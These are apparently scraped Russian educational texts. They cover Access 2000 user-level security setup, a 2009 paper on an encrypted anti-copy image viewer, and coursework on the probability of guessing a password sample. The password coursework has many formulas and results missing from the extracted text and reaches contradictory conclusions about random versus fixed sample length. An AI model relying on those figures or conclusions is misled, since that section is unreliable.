Чтобы создать и подключить новую рабочую группу, щелкните на кнопке Создать (Create). Откроется второе окно диалога администратора рабочих групп, представленное на рисунке 5. Необходимо заполнить поля Имя (Name) и Организация (Organization), а в качестве кода группы можете ввести комбинацию из букв и цифр длиной до 20 символов. Администратор рабочих групп использует содержимое трех полей для генерации уникального 64-разрядного внутреннего идентификатора. Чтобы создать другой файл рабочей группы с идентичным идентификатором, нужно ввести ту же информацию в эти три поля, причем код группы должен совпадать с точностью до регистра. Вы должны записать эту информацию и хранить ее в безопасном месте, чтобы можно было воссоздать файл рабочей группы, если он будет удален или испорчен.
Рис. 5. Информация, введенная в этом окне диалога, служит для создания уникального кода рабочей группы в новом файле рабочей группы
Щелкните на кнопке ОК, чтобы перейти в окно диалога, в котором вы можете задать имя и местонахождение нового файла рабочей группы. Если вы создаете файл в папке, в которой уже имеется файл рабочей группы, дайте новому файлу отличающееся имя, что-нибудь типа secured.mdw. Для завершения создания файла рабочей группы щелкните на кнопке ОК в этом окне диалога. Администратор изменит параметры в системном реестре, чтобы «связать» вас с только что созданной рабочей группой. Щелкните на кнопке ОК в окне подтверждения и затем на кнопке Выход (Exit) в начальном окне диалога, чтобы закрыть окно администратора рабочих групп. Если на компьютере запущено приложение Access, нужно закрыть его и снова запустить в новой рабочей группе.
После запуска Access в новой рабочей группе вам нужно добавить нового пользователя, включить его в группу Admins, определить пароль для пользователя Admin и удалить его из группы Admins. Для этого не требуется открывать базу данных. После открытия Access выберите команду СервисЗащитаПользователи и группы (ToolsSecurityUser And Group Accounts), и на экране появится окно диалога Пользователи и группы (User And Group Accounts), изображенное на рисунке 6. (Имейте в виду, что при открытии Access вы были зарегистрированы как пользователь Admin, который пока является единственным членом группы Admins в новой рабочей группе.)
Рис. 6. Создание нового пользователя в окне диалога Пользователи и группы
Если на вкладке Пользователи (Users) вы раскроете список Имя (User), то увидите единственного пользователя, определенного в этой рабочей группе, — Admin. По спискам, расположенным в нижней части вкладки, можно судить, что пользователь Admin включен в обе встроенные группы. Чуть позже будет рассказано, как добавить или удалить группы. В верхней части вкладки Пользователи находится три кнопки: одна для определения нового пользователя, вторая — для удаления пользователя, выбранного в списке (Access не позволит вам удалит пользователя Admin), а с помощью третьей кнопки можно снять пароль для выбранного пользователя.
В данном случае нужно определить нового пользователя, который станет владельцем всех объектов, являясь при этом членом группы Admins. Щелкните на кнопке «Создать» (New), чтобы открыть окно диалога Новый пользователь или группа (New User/Group), также показанное на рисунке 6. В файле рабочей группы Secured.mdw был создан пользователь с именем Andrey и личным кодом 9999. Личный код должен содержать не менее четырех, но не более 20 букв и цифр. Если вы введете точно такую же информацию в другом файле рабочей группы, то определите пользователя с совпадающим идентификатором. Учтите, что комбинация прописных и строчных букв имеет большое значение. Так в случае ввода ANDREY и 9999 будет создан пользователь, имеющий совершенно другой внутренний идентификатор. (Окно регистрации нечувствительно к регистру букв в имени пользователя, поскольку в одной и той же рабочей группе не разрешается создание двух пользователей с именами, отличающимися только регистром символов.)
Щелкните на кнопке ОК, чтобы добавить пользователя. Он появится в списке Имя (Name). В списке Имеющиеся группы (Available Groups) выделите группу Admins и щелкните на кнопке Добавить (Add), чтобы сделать нового пользователя членом этой группы. Обратите внимание, что новый пользователь уже включен в группу Users, что дает ему полные права доступа ко всем объектам в любой незащищенной базе данных. Из группы Users нельзя удалить никакого пользователя.
Выберите свое текущее имя пользователя (Admin) в раскрывающемся списке Имя. Выделите группу Admins в списке Участие в группе (Member Of) и щелкните на кнопке Удалить (Remove), чтобы исключить пользователя Admin из группы Admins. Обратите внимание, что Access не позволит вам это сделать до тех пор, пока вы не создадите нового пользователя и не добавите его в группу Admins, потому что эта группа должна содержать, по крайней мере, одного пользователя. Наконец, перейдите на вкладку Изменение пароля, как на рисунке 7 (Change Logon Password) и введите пароль в поля Новый пароль (New Password) и Подтверждение (Verify).
Рис. 7
Щелкните на кнопке Применить (Apply), чтобы назначить пароль для пользователя Admin. После задания пароля для Admin при последующих запусках Access в этой рабочей группе программа будет запрашивать у вас имя пользователя и пароль.
После создания нового пользователя закройте и снова запустите Access. Теперь при открытии любой базы данных Access будет запрашивать имя пользователя пароль, поскольку пользователь по умолчанию (Admin) уже защищен паролем.
Если вы хотите использовать мастера для защиты другой базы данных, сначала необходимо создать копию уже защищенной базы данных, владельцем которой является Andrey или другой пользователь (но только не Admin) в группе Admins (только владелец базы данных может установить для нее защиту). Для этого выполните следующие шаги.
1.Зарегистрируйтесь как новый (не Admin) пользователь.
2.Создайте новую пустую базу данных.
3.Импортируйте все объекты из базы данных, которую вы хотели защитить, с помощью команды Файл Внешние данные Импорт (File Get External Data Import). Укажите исходную базу данных и затем в окне диалога Импорт (Import) обязательно выделите все объекты.
4.Если в исходной базе данных имеются специальные меню и панели инструментов или спецификации импорта/экспорта, перейдите на вкладку Параметры (Options) и выберите соответствующие параметры для импорта этих объектов.
5.После завершения импорта необходимо откомпилировать, сохранить проект Visual Basic и сжать базу данных.
Чтобы откомпилировать проект Visual Basic, откройте любой модуль в режиме конструктора. Если в импортированной программе используются объекты Office объекты доступа к данным, в редакторе Visual Basic выберите команду Сервис Ссылки (Tools References) и включите ссылки на соответствующие библиотеки. Выберите команду Отладка Компилировать (Debug Compile) затем, если компиляция пройдет успешно, выполните команду Файл Cохранить (File Save).
Для сжатия базы данных сначала закройте ее и затем выберите команду Сервис Служебные программы Сжать и восстановить базу данных (Tools Database Utilities Compact And Repair Database).
После этого у вас будет копия базы данных, владельцем которой является новый пользователь, созданный в вашей рабочей группе.
§8. Запуск мастера
Теперь вы готовы к запуску мастера защиты (если, конечно, зарегистрировались как владелец базы данных, которую хотите защитить). Предварительно следует сделать на всякий случай запасную копию этой базы данных (хотя мастер может сам сделать это вместо вас).
Чтобы запустить мастера защиты, выберите команду Сервис Защита Мастер (Tools Security User-Level Security Wizard). Откроется окно диалога, представленное на рисунке 8.
Первое окно диалога содержит краткое описание работы мастера и предоставляет две возможности. Если вы установите верхний переключатель, мастер создаст новый файл рабочей группы, создаст новый код пользователя (не Admin) в этой рабочей группе и затем установит защиту для базы данных, используя эту рабочую группу и нового пользователя. При установке нижнего переключателя (он недоступен, если вы зарегистрировались как пользователь Admin), Access защитит базу данных, используя текущую рабочую группу текущий код пользователя.
Рис. 8. Начальное окно диалога мастера защиты
Щелкните на кнопке Далее (Next), чтобы перейти в следующее окно мастера, показанное на рисунке 9.
Рис. 9. Выбор объектов, которые нужно защитить
По умолчанию мастер защищает все объекты базы данных. (Access не обеспечивает защиты для страниц доступа к данным, поскольку они хранятся вне файла базы данных.) Вы можете отменить выбор определенных объектов, сняв флажки рядом с их именами. Например, некоторые формы и отчеты вы можете оставить незащищенными, но при этом назначить разрешения на доступ ко всем таблицам и запросам. Щелкните на кнопке Далее.
В следующем окне диалога, показанном на рисунке 10, мастер предложит создать одну пли несколько дополнительных групп. Вы можете щелкнуть на имени группы в левом списке, чтобы увидеть разрешения, которые будут предоставлены этой группе. Например, если вы хотите образовать группу пользователей, имеющих разрешения только на чтение и запуск, то установите флажок Только чтение (Read-Only Users).
Рис. 10. Выбор дополнительных групп, создаваемых мастером
Вы можете принять генерируемый случайным образом код группы, отображаемый в этом окне мастера, или ввести свой собственный код. В любом случае рекомендуется записать с точностью до регистра букв имя и код группы, поскольку эта информация может потребоваться вам при внесении изменений в группу. Мастер предоставляет возможность определить пользователей и включить их в выбранные группы.
Если вам не нужны предлагаемые мастером группы, просто щелкните на кнопке Далее, чтобы перейти в следующее окно диалога, представленное на рисунке 11.
Рис. 11. Предоставление некоторых разрешений группе Users
Это окно мастера позволяет предоставить некоторые разрешения универсальной группе Users. По умолчанию для полной защиты базы данных мастер не оставляет этой группе каких-либо разрешений. Если вы откроете защищенную базу данных, то обнаружите, что вы можете просматривать любые данные и макеты всех объектов, но вам не удастся внести какие-либо изменения. Это было достигнуто путем предоставления группе Users разрешения Открытие/запуск (Open/Run) для базы данных, а для всех других объектов — разрешения Чтение макета (Read Disign) или Чтение данных (Read Data). Для этого нужно сначала установить верхний переключатель и затем указать соответствующие разрешения в зависимости от типов объектов. Обратите внимание на предупреждение мастера по поводу предоставления разрешений группе Users! Щелкните на кнопке Далее, чтобы перейти в следующее окно диалога, показанное на рисунке 12.
Рис.12. Определение новых пользователей в рабочей группе
Чтобы добавить пользователя в рабочую группу, щелкните на элементе Добавить пользователя (Add NewUser) в начале списка, заполните поля Пользователь (UserName), Личный код (PID) и (необязательно) Пароль (Password) и затем щелкните на кнопке Добавить пользователя в список (Add This User To The List).
Новые пользователи, добавленные в этом окне, помечаются звездочкой, отображаемой рядом со значком. Вы можете просмотреть информацию о новом пользователе, выделив его имя в списке, и в случае ошибки удалить его, щелкнув на кнопке Удалить пользователя из списка (Delete User From List).
Щелкните на кнопке Далее, чтобы перейти в следующее окно диалога, показанное на рисунке 13, в котором вы можете включить пользователей в нужные группы.
Рис. 13. Определение вхождения пользователя в группу
Щелкните на кнопке Далее, чтобы перейти в последнее окно мастера, представленное на рисунке 14.
Рис.14. Последнее окно мастера защиты
Последнее окно диалога позволяет задать имя для резервной копии файла базы данных. В предложенном мастером варианте используется исходное имя базы данных с расширением .bak. Щелкните на кнопке Готово (Finish), чтобы позволить мастеру закончить свою работу.
После установки защиты для объектов базы данных мастер выведет отчет со сведениями о новой рабочей группе (если она создавалась) и информацией, которая может вам потребоваться при переопределении пользователей и групп, созданных мастером. При закрытии окна отчета мастер предложит сохранить отчет в файле снимка (с расширением .snp). Данным предложением мастера следует воспользоваться, чтобы не потерять эту критически важную информацию. Затем мастер закроет защищенную базу данных, зашифрует се и снова ее откроет. Если в базе данных определена начальная (стартовая) форма, вы можете удерживать нажатой клавишу Shift в течение этого процесса, чтобы избежать запуска приложения при открытии защищенной базы данных.
Если результат вас не устраивает, вы можете удалить защищенную базу данных, восстановить исходную базу данных, переименовав резервную копию, созданную мастером.
§9. Настройка защищенной базы данных
После создания защищенной базы данных нужно определить новые группы и пользователей, чтобы облегчить предоставление нужных вам разрешений. Вы можете создать только новых пользователей, но в этом случае вам придется назначать разрешения каждому пользователю индивидуально. Значительно удобнее определить по одной группе для каждого уровня доступа, который вы намерены предоставить, затем определить пользователей и включить их в соответствующие группы.
Откройте защищенную базу данных (удерживайте нажатой клавишу Shift, если вы открываете защищенную копию базы данных). Выберите команду Сервис Защита Пользователи и группы (Tools Security User And Group Accounts), чтобы вывести на экран окно диалога Пользователи и группы (User And Group Accounts). На вкладке Группы (Groups) щелкните на кнопке Создать (New), чтобы открыть окно диалога Новый пользователь или группа (New User/Group), показанное на рисунке 15. Создание новой группы совершенно аналогично определению нового пользователя – генерация внутреннего идентификатора группы производится с учетом регистра символов в имени и коде, которые вы ввели. Щелкните на кнопке ОК, чтобы добавить новую группу.
Рис.15. Создание новой группы защиты
Затем нужно создать пользователей и включить их в только что созданные группы.
Чтобы определить пользователя как члена группы, выберите команду Сервис Защита Пользователи и группы. На вкладке Пользователи (Users) выберите пользователя, которого вы хотите включить в одну или несколько групп. В левом списке окна диалога отображаются имеющиеся группы, а правом списке — группы, в которые входит этот пользователь. На рисунке 16 показано добавление в группу NotAdmin пользователя Buchanan_Nike.
Рис. 16. Включение пользователя в группу
Теперь нужно назначить разрешения для каждой группы. Закройте окно диалога Пользователи и группы. Выберите команду Сервис Защита Разрешения (Tools Security User And Group Permissions), чтобы открыть окно диалога, показанное на рисунке 17.
Установите переключатель Список (List) в положение Группы (Groups), чтобы увидеть список групп. Вы можете начать с предоставления всех разрешений группе AppAdrmin. Выделите ее в списке Пользователи и группы (User/Group Name) и затем последовательно выбирайте каждый тип объекта в раскрывающемся списке Тип объекта (Object Type). Начните с самой базы данных и установите флажок Администратора (Administer) в области Разрешения (Permissions). Перед выбором нового типа щелкните на кнопке Применить (Apply). После выбора пункта Таблицы (Tables) в раскрывающемся списке Тип объекта выделите все элементы в списке объектов. Для этого выделите самый верхний элемент, прокрутите список вниз и щелкните на последнем элементе при нажатой клавише Shift. Сделайте так, чтобы флажок Администратора появился с черной (а не серой) галочкой, и щелкните на кнопке Применить. То же самое проделайте для запросов, форм, отчетов, макросов и модулей.
Рис.17. Назначение ограничений разрешений группе NotAdmin
Выделите группу NotAdmin в левом списке. Для базы данных предоставьте только разрешение Открытие/запуск (Open/Run). Для всех таблиц и запросов предоставьте разрешение Чтение данных (Read Data), а для всех форм, отчетов и макросов — разрешение Открытие/запуск. Теперь вы готовы к определению пользователей и включения их в соответствующие группы.
Таким образом, в базе данных был сделан ряд изменений, чтобы адаптировать работу к использованию защиты. Например, формы уже не требуют ввода имени, а с помощью встроенной функции CurrentUser анализирует текущий код пользователя Access и устанавливает ваш статус в зависимости от того, являетесь ли вы членом группы. Затем она просит только подтвердить ваш код пользователя. Если программа Access запущена не в рабочей группе или в файле рабочей группы не определены нужные группы, приложение закроет базу данных. Кроме того, не обнаружив вашего кода пользователя Access в таблицах (в которые добавлено поле Access User ID), приложение не позволит продолжить работу.
Список литературы.
Д. Вейскас Эффективная работа с Microsoft Access 2000. С-Пб.: Питер, 2001 год.
С. Робинсон Microsoft Access 2000. Учебный курс. С-Пб.: Питер, 2000 год. |
https://doc4web.ru/informatika/zaschita-cifrovih-izobrazheniy-ot-nesankcionirovannogo-kopirovan.html | Защита цифровых изображений от несанкционированного копирования | https://doc4web.ru/uploads/files/136/df8b878d7deedb2efeb2822af88e208e.docx | files/df8b878d7deedb2efeb2822af88e208e.docx | Защита цифровых изображений от несанкционированного копирования
В. А. Голуб, И. В. Цветков, Воронежский государственный университет
Введение
В настоящее время широко распространена передача цифровых изображений от авторов потребителям или посредникам средствами Inter net, а так же на различных цифровых носителях. Легкость копирования таких изображений приводит к тому, что постоянно возрастает число нарушений авторских прав на графические рабо ты, в связи с незаконным использованием этих работ, в частности, путем их несанкционированного размещения в интернет-галереях. Таким образом, актуальной является проблема защиты прав авторов цифровых графических работ, техническое решение которой базируется, прежде все го, на предотвращении незаконного копирования и распространения цифровых изображений.
Программное обеспечение, предназначенное для защиты авторских прав на графические работы, может представлять интерес для специалистов, занимающихся дизайном, фотографией, графикой и т.п., которым необходимо, с одной стороны, представлять свои работы потенциальному заказчику, а с другой стороны, быть застрахованными от возможного нарушения авторских прав, связанного с незаконным использованием их работ. В настоящее время авторы вынуждены представлять потртфолио, зачастую содержащее сильно уменьшенные цифровые изображения (preview), качество которых специально занижено, что не позволяет в полной мере оценить их достоинства. В этой связи, приложение, позволяющее предоставить изображения в оригинальном разрешении, но без возможности их копирования, представляет значительный практический интерес для широких кругов специалистов, работающих в области дизайна, фотографии, digital art и т.д.
Данная работа посвящена решению задачи защиты цифровых изображений от несанкционированного копирования. Для этого необходимо предложить методы и алгоритмы для противодействия копированию цифровых графических файлов в процессе их просмотра и хранения, а так же разработать программное обеспечение, реализующее такие алгоритмы. Таким образом, целью работы является разработка приложения, предназначенного для просмотра цифровых изображений, без возможности их копирования, а также не позволяющее стороннему программному обеспечению работать с этой графической инфор-© Голуб В. А., Цветков И. В., 2009 мацией. ВЕСТНИК ВГУ, СЕРИЯ: СИСТЕМНЫЙ АНАЛИЗ И ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ. 2009. № 2 31 Защита цифровых изображений от несанкционированного копирования 1. АНАЛИЗ СУЩЕСТВУЮЩИХ СПОСОБОВ ЗАЩИТЫ ЦИФРОВЫХ ИЗОБРАЖЕНИЙ ОТ НЕСАНКЦИОНИРОВАННОГО КОПИРОВАНИЯ В настоящее время используются следующие способы решения задачи защиты авторских прав на изображения в цифровом виде.
1. Использование различных символов, наносимых на изображение при помощи специальных приложений таких, как, например, Photo Watermark Professional. Данный способ защиты изображений не защищает их от копирования и распространения в различных сетях. Специальные символы часто отвлекают от просмотра изображения, портят его, если являются громоздкими, или могут быть удалены с него в графическом редакторе, если они достаточно малы [1].
2. Использование изображений уменьшенного размера или изображений с низким разрешением. Такие изображения используются при продаже фотографий через Интернет в качестве образца продаваемого изображения и не представляют серьезной ценности.
Понятно, что описанные способы в ряде случаев не позволяют получить необходимый результат, когда изображение имеет высокое качество, но при этом надежно защищено от несанкционированного копирования. Решение такой задачи предполагает обеспечение защищенного хранения и просмотра цифровой графической информации. Для этого, во-первых, необходимо решить задачу защищенного хранения цифровых изображений. Для ее решения можно использовать шифрование оригинала изображения и хранение его в шифрованном виде. Использование такого подхода требует решения задач хранение ключа шифрования и зашифрованного изображения. В качестве решения этой проблемы можно использовать другой формат файла, содержащего шифрованное изображение, что также может повысить скорость работы приложения, за счет того, что в таком файле можно хранить превью изображения для быстрого просмотра. Ключ шифрования можно хранить различными способами в различных составляющих файла. Во-вторых, необходимо решить задачу защиты цифрового изображения от копирования на стадии просмотра. Существует множество способов копирования информации, представленной на рабочем столе (например, Print Screen). Необходимо суметь перехватывать соответствующие команды и модифицировать используемую ими информацию.
2. ОПИСАНИЕ АЛГОРИТМОВ И ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ ДЛЯ ЗАЩИТЫ ЦИФРОВЫХ ИЗОБРАЖЕНИЙ ОТ НЕСАНКЦИОНИРОВАННОГО КОПИРОВАНИЯ
Таким образом, разрабатываемое приложение для защиты графических файлов должно быстро работать с большими объемами информации (качественные графические файлы имеют большой объем) и обеспечивать контроль доступа к этой информации. При этом изображение не должно быть доступно в незащищенном виде ни на одном из этапов его передачи. Одним из направлений решения поставленной задачи является использование специального формата файла в сочетании с применением криптографических методов защиты, а именно, шифрования данных. Предлагаемый формат файла имеет следующую структуру (при условии чтения файла побайтно):
1) записывается информация о превью изображении в формате BitMap(подробнее о приложении в [2]);
2) записывается само изображение без записи информации о конце файла изображения;
3) записывается размер файла превью и размер файла, содержащего ключ шифрования;
4) записывается информация о BitMap-файле и признак конца фала превью;
5) записывается файл, содержащий ключ шифрования;
6) записывается фал с шифрованным изображением.
При использовании такого формата файла появляется возможность просматривать превью стандартными средствами Windows, что позволяет облегчить процесс просмотра изображений.
Принципиально важным моментом является организация хранения криптографического ключа. Для хранения ключа шифрования используется отдельный файл, содержащий Bit-Map рисунок 170х170 пикселей. Данный файл создается на основе специально сгенерированной псевдослучайной последовательности, со-32 ВЕСТНИК ВГУ, СЕРИЯ: СИСТЕМНЫЙ АНАЛИЗ И ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ. 2009. № 2 В. А. Голуб, И. В. Цветков держащей числа от 1 до 999 включительно. Три цифры, составляющие число выступают в качестве rgb-параметров при заполнении каждого пикселя данного изображения. Таким образом, изображение содержит 86700 цифр [3].
Шифрованное изображение, записанное побайтно, хранится в полученном файле после файла-ключа и не может быть открыто сторонними приложениями, предназначенными для просмотра изображений.
Отдельной важной задачей является противодействие копированию изображения с использованием функции Print Screen, представляющей самый простой и распространенный из нескольких возможных способов доступа к графической информации, представленной на рабочем столе. Для защиты от такого способа несанкционированного копирования необходимо программными средствами обеспечить перехват нажатий клавиши <Print Screen> и после этого подменить изображение, размещенное в буфере обмена на некоторое изображение, подготовленное заранее, например, черный квадрат, как реализовано в описываемой программе. Данный способ защиты реализуется функцией, контролирующей ввод с клавиатуры, и изменяющей информацию в буфере обмена после вызова функции Print Screen.
Кроме этого, необходимо решить задачу защиты цифрового изображения от копирования при помощи сторонних приложений, делающих копии экрана (скрин-шот) на стадии просмотра. Наиболее эффективной защитой от программ, делающих скрин-шот при помощи API-функций, является выведение изображения не на стандартном компоненте, а на канве, рисуемой над канвой рабочего стола. Также возможно контролировать вызов WIN API функций и при вызове функций, копирующих изображение, скрывать выведенное изображение, либо запрещать вызов данной функции системными средствами [4].
Описанные выше принципы защиты цифровых изображений от несанкционированного копирования были программно реализованы в специальном приложении. Приложение состоит из двух самостоятельных программ: утилиты шифрования цифрового изображения и программы для расшифровки и просмотра. Первая из них предназначена для авторов, владеющих правами на изображения, и предназначена для создания зашифрованной копии изображения, которое может быть открыто с помощью любых программ-просмотрщиков, но только в виде превью очень малого размера. В полном размере и хорошем качестве зашифрованное изображение не может быть просмотрено никакими средствами, кроме специального просмотрщика-расшифровщика, представленного второй программой. Программа-просмотрщик предназначена для тех пользователей, которые заинтересованы в оценке качественных полноразмерных изображений, но не должны иметь возможности копировать их без разрешения автора.
Интерфейс программы шифрования цифрового изображения организован таким образом, что пользователь может выбрать предназначенный для шифрования графический файл из списка, содержащего разделы жесткого диска, дерево папок и список файлов, находящихся в выбранной папке. При этом для облегчения и ускорения поиска нужного файла используется фильтр графических файлов по расширениям, а выделенное изображение отображается справа от списка папок в уменьшенном виде. После выбора файла изображения запускается процесс его шифрования, в результате которого формируется новый файл с именем исходного файла и расширением JPGX. В начало файла записывается уменьшенная незашифрованная копия изображения — превью, для облегчения в дальнейшем поиска нужного изображения без его расшифрования.
Программа просмотра зашифрованного изображения обеспечивает выбор требуемого графического файла. При этом для ускорения и облегчения выбора графического файла в окне программы отображается извлеченное из файла малоразмерное превью. По завершении процесса расшифрования на экран выводится полноразмерное изображения, масштаб которого может быть изменяем. Какие-либо другие действия с расшифрованным изображением, в том числе его копирование, блокируются.
Тестирование разработанного программного обеспечения показало корректную и стабильную его работу. В частности, как это и должно быть, копирование с использованием функции Print Screen оказалось заблокировано, а попытки использовать графические редакторы и программы-просмотрщики для получения исходного полноразмерного изображения оказались безрезультатными. Стандартные средства Windows, например Paint, позволяли открыть только малоразмерные специально созданные превью-изображения. Также было подтверждено, что в процессе шифрования-расшифрования изображений не происходит их искажений.
Заключение
Таким образом, в работе предложен метод защиты цифровых изображений от несанкционированного копирования, использующий разработанные алгоритмы для защиты цифрового изображения на стадии просмотра. Разработано программное обеспечение, включающее два приложения: первое позволяет при помощи алгоритма шифрования RC-6 создавать предназначенные для распространения шифрованные защищенные от копирования и модификации копии изображений, второе предназначено для просмотра шифрованного изображения также без возможности его копирования и модификации. Предлагаемый программный продукт обеспечивает сохранность изображения как в процессе хранения, так и в процессе его просмотра.
Список литературы
1. PhotoWatermark Professional official web site. — (www.photowatermark.com).
2. База знаний Delphi — Файловаясистема — Файлы. — (http://www.kansoftware.ru/?did=188). 3. Графический формат BMP. — (http://forum. vingrad.ru/articles/topic-94227.html). 4. Список приложений, позволяющих делать «снимки» экрана. — (http://www.softsoft.ru/search/ 3634/index.htm). |
https://doc4web.ru/informatika/zaschischennost-viborki-simvolov.html | Защищенность выборки символов | https://doc4web.ru/uploads/files/119/e900017059d9917063414da6ea4253f2.docx | files/e900017059d9917063414da6ea4253f2.docx | 1 Анализ вероятности входа в систему злоумышленником с одной и трех попыток.
При выполнении анализа предполагается, что злоумышленник угадывает правильный пароль, выполняя одну или три попытки входа в систему. При этом во втором случае предполагается, что злоумышленник обладает памятью, и не вводит повторно ранее введенные комбинации.
В рассматриваемом случае пароль является выборкой из заданного алфавита. Это означает, что на каждом знакоместе пароля может стоять любой из символов алфавита. Тогда число возможных паролей определяется в первую очередь размерностью алфавита.
, где k – размерность алфавита, t – длина пароля.
Данная длина выборки (t) составляет от 3 до 5 символов. Алфавит равен 62 символам. Воспользуемся формулой нахождения числа размещений с повторениями из k элементов по t для каждой длины выборки.
Так как используется метод случайной длины выборки, то может потребоваться ввести любой порядковый номер символа из заданной длины. Следовательно, общее количество размещений будет равно:
Согласно классическому определению вероятности: вероятность события «А» равна отношению числа случаев, благоприятствующих ему, к общему числу случаев, т.е. , где Р(А) – вероятность события «А»; m – число случаев, благоприятствующих событию «А»; n – общее число случаев.
Необходимо рассмотреть вероятность входа в систему злоумышленником с одной попытки.
Тогда согласно классическому определению вероятности: событие «А» - отгадывание злоумышленником выборки с одной попытки и вход в систему. Получается, что число случаев, благоприятствующих событию «А» равно 1, поскольку только одна комбинация даст возможность войти в систему, а общее число случаев будет равняться для выборок в 3, 4 и 5 символов соответственно А1 А2 и А3 , посчитанные ранее.
Подставим эти значения в формулу P(A)=m/n и получим:
(выборка 3 символа);
P(А2) = (выборка 4 символа);
(выборка 5 символов).
Рассмотрим случай, когда злоумышленник отгадывает пароль с трёх попыток, причём он не повторяет в дальнейшем ранее введённых комбинаций.
Тогда событие «В» - отгадывание злоумышленником пароля с 3-х попыток и вход в систему. Получается, что злоумышленник может войти в систему как с первого, так со второго или с третьего раза. Следовательно по теореме сложения вероятностей, вероятность суммы несовместных событий будет равна сумме вероятностей этих событий:
, где Am – число всех возможных выборок
размерности m.
Подставив значения в формулу получаем:
(выборка 3 символа);
(выборка 4 символа);
(выборка 5 символов).
При сравнении данных вероятностей отгадывания пароля с одной и трёх попыток, очевидно, что вероятность отгадывания с трёх попыток приближённо в 3 раза больше (3,000013).
Чем больше возможных комбинаций пароля мы перебираем, тем больше у нас шансов его отгадать. Таким образом достигнуть увеличения вероятности можно при значительном уменьшении (маленький алфавит или малая длина пароля) или значительном увеличении числа попыток.
2 Вероятности входа в систему при фиксированной и случайной длине выборки.
Следует учесть, что разные пароли при одной и той же выборке могут дать одинаковый результат – если различие в паролях находится вне выборки. Также разные выборки на различных частях одного пароля могут дать одинаковый результат.
Кроме того, выборка может быть как непрерывной (т.е. выборка состоит из последовательно стоящих (рядом находящихся) элементов пароля), так и произвольной.
В данном случае будем предполагать, что все сочетания пароля и выборки образуют уникальные комбинации.
Кроме того, выборка может быть как непрерывной (т.е. выборка состоит из последовательно стоящих (рядом находящихся) элементов пароля), так и произвольной. То есть выборка - это произвольная последовательность произвольных символов пароля.
2.1 Вероятность входа в систему при фиксированной длине выборки на нижнем и верхнем пределах.
Чтобы рассчитать вероятность входа, вернёмся к классическому определению вероятности. В начале рассчитаем вероятность входа при фиксированной длине на нижнем пределе (длина выборки 3 символа).
Тогда событие «А» - отгадывание злоумышленником элементов выборки из 3 символов и вход в систему. Число случаев, благоприятствующих событию «А» равно 1. Общее число случаев будет равняться . Подставим эти значения в формулу P(A)=m/n и получим:
Теперь рассчитаем вероятность входа при фиксированной длине выборки на верхнем пределе (длина выборки 5 символов).
Тогда событие «В» - отгадывание злоумышленником элементов выборки из 5 символов и вход в систему. Аналогично событию «А», число случаев, благоприятствующих событию «B» равно 1. Общее число случаев будет равняться .
Подставим эти значения в формулу P(B)=m/n и получим:
Если сравнить полученные значения вероятностей, то получим, что вероятность входа при фиксированной длине выборки на нижнем пределе в 3844 раза выше, чем на верхнем пределе.
2.2 Вероятность входа при случайной длине выборки.
Рассмотрим случай, когда система использует случайную длину выборки символов.
Мы уже вычисляли:
P(A) = (выборка 3 символа)
P(B) = (выборка 5 символов).
Теперь вычислим вероятность входа в систему для выборки из 4 символов:
P(C) = (выборка 4 символа).
Для того чтобы определить вероятность входа в систему при случайной длине выборки необходимо ещё знать вероятность выпадения каждой выборки из заданной длины (от 3 до 5 символов). Необходимо учесть, что вероятность выдачи системой любой из выборок от 3 до 5 символов является равновероятна:
= 1/3.
Теперь мы можем вычислить вероятность входа при случайной длине выборки, используя формулу , где P(i) – вероятность благоприятного исхода i-го события, Pi– вероятность выпадения i-го события.
Вероятность входа в систему при случайной длине выборки будет равна:
2.3 Сравнение вероятности входа при фиксированной длине выборки со случайной длиной. Оценка эффективности метода случайной выборки символов.
Теперь сравним вероятность отгадывания пароля и входа в систему при случайной длине выборки с вероятностью, которую мы получили при фиксированной длине выборки.
Pвыб 5 () < Pслуч. (1,42155*10-6) < Pвыб 3 ()
Вероятность входа при случайной длине выборки всего в несколько раз
(в 2,95 ≈ 3 раза) меньше, чем при фиксированной длине выборки на нижнем пределе; и более чем в 1000 раз больше, чем на верхнем пределе.
Близость вероятности входа при случайной длине выборки и вероятности входа при фиксированной длине выборки на нижнем пределе объясняется следующим:
- распределение вероятностей выдачи системой любой из выборок от 3 до 5 символов является равновероятной;
- вероятность входа в систему при угадывании выборки в 3 символа на несколько порядков (в 62 и в 622 раза) больше остальных.
Следовательно вероятности входа при угадывании выборок в 4 и 5 символов незначительно влияют на общую вероятность.
Полученные числовые данные показывают, что метод случайной выборки символов эффективнее в плане несанкционированного входа, чем метод использования фиксированной длины выборки.
Таким образом для обеспечения более высокого уровня защиты, безопаснее использовать фиксированную длину выборки (чем ближе к верхнему пределу тем безопаснее).
Стоит отметить, что при заданных параметрах алфавита и длины пароля, для того чтобы перебрать все возможные комбинации пароля, необходимо огромное количество времени. Это делает практически невозможным отгадывание нужных символов и вход в систему злоумышленником без использования технических и других средств взлома.
3 Исследование защищенности (надёжности) метода при подглядываниях.
На предыдущих этапах курсовой работы мы исследовали случаи, когда злоумышленник не мог зафиксировать ответ пользователя на запрос системы. Теперь рассмотрим несколько иной случай. В данном случае злоумышленник подглядывает, что вводит пользователь, причём он узнаёт как запрос системы, так и ответ пользователя.
Система выдаёт запрос, пользователь отвечает на него, а злоумышленник фиксирует как запрос, так и ответ на него. Получается, что у него в руках оказывается часть пароля. Необходимо определить вероятность входа при заданном количестве подглядываний.
3.1 Расчет вероятности входа при заданном количестве подглядываний.
Рассчитаем вероятность входа в систему злоумышленника при 10 подглядываниях для заданной длины выборки (от 3 – 5 символов) девятизначного пароля.
Для расчета прибегнем к:
1) классическому определению вероятности
, где Р (А) – вероятность события «А»; m – число случаев, благоприятствующих событию «А»; n – общее число случаев.
2) формуле вычисления заданного числа комбинаций из определённой области определения (алфавит)
, где - число сочетаний из k по t, k – размерность алфавита,
t – длина выборки.
Начнём с длины выборки в 3 символа. Необходимо определить число сочетаний из 9 символов по 3:
То есть существует 84 различных комбинаций 3 символов. Злоумышленник после 10 подглядываний узнаёт 10 различных комбинаций выборок по 3 (из 84 возможных). Вероятность того, что злоумышленник войдёт в систему с первого раза, составит:
Используя приведённый выше метод, определим вероятности входа в систему для оставшихся длин выборок:
(для выборки из 4 символов)
(для выборки из 5 символов)
Теперь рассмотрим вариант, когда система использует метод случайной длины выборки. Так как выпадет один из 3 вариантов (длина выборки: 3 символа, 4 символа или 5символов) то эти события равновероятны и их вероятность = 1/3.
В этом случае вероятность входа злоумышленником в систему с одной попытки будет:
